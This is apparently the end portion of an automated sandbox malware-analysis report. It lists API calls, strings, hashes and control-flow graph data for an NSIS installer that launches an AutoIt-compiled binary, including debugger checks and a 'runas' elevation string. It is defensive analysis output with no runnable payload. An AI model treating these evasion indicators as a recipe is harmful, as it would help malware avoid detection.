                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                      APIs
                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringlstrcmp
                                                                                                      • String ID: !N~
                                                                                                      • API String ID: 623250636-529124213
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                      Strings
                                                                                                      • Error launching installer, xrefs: 00405C74
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                      • String ID: Error launching installer
                                                                                                      • API String ID: 3712363035-66219284
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                        • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                      • API String ID: 3509786178-2769509956
                                                                                                      APIs
                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                      • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 190613189-0

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:0.2%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:15.1%
                                                                                                      Total number of Nodes:166
                                                                                                      Total number of Limit Nodes:2
81068->80991 81069->80993 81070->80995 81071->80997 81072->80999 81073->81004 81074->81014 81075->81014 81076->81014 81077->81013 81078->81020 81079->81024 81080->81027 81081->81000 81082->81000 81083->81000 81084->81000 81085->81003 81086->80969 81087->80929 81091 2453ca30330 81088->81091 81090 2453ca213b8 81090->81032 81092 2453ca3034e 81091->81092 81095 2453ca3037b 81091->81095 81092->81090 81093 2453ca30423 81094 2453ca3043f malloc 81093->81094 81096 2453ca30460 81094->81096 81095->81092 81095->81093 81096->81092

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2643109117-0
                                                                                                      • Opcode ID: e8f760b2598f29be43354d7eef8e63f86ba430a7196901695baf565450b45d0e
                                                                                                      • Instruction ID: f6c9faa0bf927cee10b5a2cf503dff4c8ea5842be4dd4437f03a7ce028220ce1
                                                                                                      • Opcode Fuzzy Hash: e8f760b2598f29be43354d7eef8e63f86ba430a7196901695baf565450b45d0e
                                                                                                      • Instruction Fuzzy Hash: 61510C37601E7483E653AF55E99C3692BA1B749BC4F4040A6DACA477A7DE3DC8C18740

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: efa557268f1945d94d8dc75b26b63d132cbe65a3d90029b8f465c22dc591ccc4
                                                                                                      • Instruction ID: 391b643ad5526e38102a0b74202b988ca7faebe41b64a0725fc4824063baf467
                                                                                                      • Opcode Fuzzy Hash: efa557268f1945d94d8dc75b26b63d132cbe65a3d90029b8f465c22dc591ccc4
                                                                                                      • Instruction Fuzzy Hash: D5F0A977608F5087D615DF91F96965ABFA0F38A7C0F005859AAC947B26DB3CC190CB40

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                      • String ID: Shell_TrayWnd
                                                                                                      • API String ID: 3778422247-2988720461
                                                                                                      • Opcode ID: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                                                                                                      • Instruction ID: 0db75b9b9bb19da3522621fa826a5b993227a8da442408bc6b3689dbf7a8bd70
                                                                                                      • Opcode Fuzzy Hash: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                                                                                                      • Instruction Fuzzy Hash: DA418771B0E512E2F7156B25F81863DA2B2BF88B99FD28079C80A47774DE3DA40B4760
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                      • String ID:
                                                                                                      • API String ID: 3372153169-0
                                                                                                      • Opcode ID: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                                                                                                      • Instruction ID: cb88c9b273413dee63a67df042e1f45021f47f4ab6d855fde849b00c5799f137
                                                                                                      • Opcode Fuzzy Hash: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                                                                                                      • Instruction Fuzzy Hash: 0B22C062E0A643D1FBA6AF24E4502BEA771FB40B94F964175CA1E476B0DE3CE4479330

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1497 7ff7aa0f2820-7ff7aa0f2871 call 7ff7aa114a6c call 7ff7aa0f1314 1502 7ff7aa13a4fe-7ff7aa13a502 1497->1502 1503 7ff7aa0f2877-7ff7aa0f2889 call 7ff7aa0f1470 1497->1503 1505 7ff7aa13a508-7ff7aa13a50f 1502->1505 1506 7ff7aa0f288d-7ff7aa0f28c6 1502->1506 1503->1506 1510 7ff7aa13a511-7ff7aa13a519 1505->1510 1508 7ff7aa13a52e-7ff7aa13a530 1506->1508 1509 7ff7aa0f28cc-7ff7aa0f28f3 1506->1509 1511 7ff7aa13a53b-7ff7aa13a545 1508->1511 1509->1511 1512 7ff7aa0f28f9-7ff7aa0f291a 1509->1512 1510->1506 1513 7ff7aa13a51f-7ff7aa13a527 1510->1513 1517 7ff7aa13a547-7ff7aa13a549 1511->1517 1518 7ff7aa13a563-7ff7aa13a57f call 7ff7aa0f2794 1511->1518 1514 7ff7aa0f2953-7ff7aa0f2957 1512->1514 1515 7ff7aa0f291c-7ff7aa0f2950 SystemParametersInfoW GetSystemMetrics 1512->1515 1513->1510 1516 7ff7aa13a529 1513->1516 1520 7ff7aa0f29ab-7ff7aa0f2a3e SetRect AdjustWindowRectEx CreateWindowExW 1514->1520 1521 7ff7aa0f2959-7ff7aa0f2993 SystemParametersInfoW GetSystemMetrics 1514->1521 1515->1514 1516->1506 1522 7ff7aa13a620-7ff7aa13a62c call 7ff7aa0f17fc 1517->1522 1523 7ff7aa13a54f-7ff7aa13a55e 1517->1523 1530 7ff7aa13a599-7ff7aa13a5f3 GetWindowRect GetClientRect GetSystemMetrics * 2 1518->1530 1531 7ff7aa13a581-7ff7aa13a592 1518->1531 1528 7ff7aa0f2a44-7ff7aa0f2abf SetWindowLongPtrW GetClientRect GetStockObject SendMessageW call 7ff7aa0f1990 1520->1528 1529 7ff7aa13a60c-7ff7aa13a60e 1520->1529 1521->1520 1527 7ff7aa0f2995-7ff7aa0f29a8 GetSystemMetrics 1521->1527 1524 7ff7aa13a636 1522->1524 1523->1524 1537 7ff7aa13a63d-7ff7aa13a641 1524->1537 1527->1520 1540 7ff7aa0f2ac1-7ff7aa0f2ad6 SetTimer 1528->1540 1541 7ff7aa0f2add-7ff7aa0f2afe call 7ff7aa0f27e8 1528->1541 1529->1522 1532 7ff7aa13a610-7ff7aa13a61e 1529->1532 1530->1512 1536 7ff7aa13a5f9-7ff7aa13a607 GetSystemMetrics 1530->1536 1531->1530 1532->1524 1536->1512 1538 7ff7aa13a62e-7ff7aa13a631 call 7ff7aa19fa30 1537->1538 
1539 7ff7aa13a643-7ff7aa13a646 1537->1539 1538->1524 1539->1538 1542 7ff7aa13a648-7ff7aa13a654 call 7ff7aa11428c 1539->1542 1540->1541 1541->1537 1548 7ff7aa0f2b04-7ff7aa0f2b21 1541->1548
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                      • API String ID: 1458621304-248962490
                                                                                                      • Opcode ID: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                                                                                                      • Instruction ID: fdee9bce36856b79cca440bd822aca32049a8c16320a2e64175d62115935cba9
                                                                                                      • Opcode Fuzzy Hash: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                                                                                                      • Instruction Fuzzy Hash: 64D19F72A0A642DAF755EF69E8402BD77B0FB48758F820179DA0E536A4DF3CE446C720
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P
                                                                                                      • API String ID: 0-3110715001
                                                                                                      • Opcode ID: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                                                                                                      • Instruction ID: b05c3b98ef8c98f47fe2b2a69e16ec9ec8f96aa5f97ca8fd3cefe384dcdb0b66
                                                                                                      • Opcode Fuzzy Hash: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                                                                                                      • Instruction Fuzzy Hash: 79A1AF72A0A642D6F769EF25E4402AEB770FF84B88F828175DA5E03664CF3DE546C710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                      • String ID: -$:$:$?
                                                                                                      • API String ID: 3440502458-92861585
                                                                                                      • Opcode ID: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                                                                                                      • Instruction ID: 2ceec1770ac459cab52acd18af5a118f13eebee5cb3b909040f3b622442d3d03
                                                                                                      • Opcode Fuzzy Hash: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                                                                                                      • Instruction Fuzzy Hash: 03E1D732E0A282E5F76ABF21F8416A9B670AB94784FC54175EA5E426A5CF3CD4438730
                                                                                                      APIs
                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3BA6
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3BBB
                                                                                                      • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3C35
                                                                                                        • Part of subcall function 00007FF7AA0F2BEC: GetFullPathNameW.KERNEL32(?,00007FF7AA0F3C67,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F2C4D
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3CCC
                                                                                                      • MessageBoxA.USER32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA13AA96
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA13AAE3
                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA13AB6A
                                                                                                      • ShellExecuteW.SHELL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA13AB91
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D06
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D16
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D2B
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D44
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D5D
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: LoadImageW.USER32 ref: 00007FF7AA0F3D89
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: RegisterClassExW.USER32 ref: 00007FF7AA0F3DED
                                                                                                        • Part of subcall function 00007FF7AA0F3E24: CreateWindowExW.USER32 ref: 00007FF7AA0F3E74
                                                                                                        • Part of subcall function 00007FF7AA0F3E24: CreateWindowExW.USER32 ref: 00007FF7AA0F3EC7
                                                                                                        • Part of subcall function 00007FF7AA0F3E24: ShowWindow.USER32 ref: 00007FF7AA0F3EDD
                                                                                                        • Part of subcall function 00007FF7AA0F477C: Shell_NotifyIconW.SHELL32 ref: 00007FF7AA0F4874
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                      • API String ID: 1593035822-2030392706
                                                                                                      • Opcode ID: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                                                                                                      • Instruction ID: 31d02aa64f8ebbccca4a800a98a6909e7163d9b256c2621b3702ee981e4f50f5
                                                                                                      • Opcode Fuzzy Hash: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                                                                                                      • Instruction Fuzzy Hash: 1E61506290E683E6FA62BB20F9800FAE774BF50354FC600B5D54D165B6EE2CE55BC320
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 312131281-0
                                                                                                      • Opcode ID: 0640e42022e33a737d8eb2def458af6152ae9067368d775b9534069338d73c9b
                                                                                                      • Instruction ID: ca503cd69de967b0c7a65256d7ae3205172defec30386fb957641ec4650ca27d
                                                                                                      • Opcode Fuzzy Hash: 0640e42022e33a737d8eb2def458af6152ae9067368d775b9534069338d73c9b
                                                                                                      • Instruction Fuzzy Hash: 2271BF36609A81E6E7219F65E880AEDB770FB88B94F864032EA4D43B64CF3CD147C710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                      • String ID: ?
                                                                                                      • API String ID: 500310315-1684325040
                                                                                                      • Opcode ID: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                                                                                                      • Instruction ID: 7f845d0255dca9bd0af0bcdaf48d37a50ee1c2ca416b0ebea807886f38acbf5b
                                                                                                      • Opcode Fuzzy Hash: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                                                                                                      • Instruction Fuzzy Hash: B861DD72E0A642E6F7A6BF21F8402A9B7B0AF54784FC60171E95D426A4CF3CE542C770
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF7AA0F2794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF7AA13A57D), ref: 00007FF7AA0F27B1
                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA0F25EA
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA0F26F8
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA0F270D
                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA0F2786
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ColorProc$LongWindow
                                                                                                      • String ID: +
                                                                                                      • API String ID: 3744519093-2126386893
                                                                                                      • Opcode ID: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                                                                                                      • Instruction ID: 337e555b318ec4289a898fab4860c6f6829b9277fc2e34f4075dec65acd6f23b
                                                                                                      • Opcode Fuzzy Hash: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                                                                                                      • Instruction Fuzzy Hash: 97E1FF32E0E247C6F6757E29A98817EE665AB18BC0FC601B5D84C57BF5DE3DE0428720
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
